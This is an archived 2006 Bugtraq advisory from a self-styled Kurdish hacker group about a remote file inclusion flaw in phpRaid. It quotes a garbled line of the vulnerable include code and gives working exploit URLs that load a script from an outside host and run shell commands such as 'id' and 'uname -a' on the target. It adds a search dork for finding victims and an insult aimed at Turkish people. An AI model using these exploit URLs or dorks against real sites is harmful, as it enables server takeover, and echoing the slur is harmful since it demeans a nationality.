| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060508100807.23380.qmail@securityfocus.com> Date: 8 May 2006 10:08:07 -0000 From: botan@...uxmail.org To: bugtraq@...urityfocus.com Subject: [Kurdish Security # 5] phpRaid Remote File Include [SMF] # Kurdish Security Advisory # phpRaid Remote File Include [SMF] :} # "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@...uxmail.org # Risk : High # Class : Remote # Script : phpRaid # Script Website : http://www.spiffyjr.com # Version : phpRaid v2.9.5 " v3.0.b1 " v3.0.b2 " v3.0.b3 # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D # Special Bastard : Turkish Lame # w0rkz : "phpRaid" "inurl:"phpRaid" etc. :) --------------------------------------------------------------------- # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code : Now SMF portal code :) // includes include($smf_root_path= . 'SSI.php'); ----------------------------------------------------------------------- http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a
Powered by blists - more mailing lists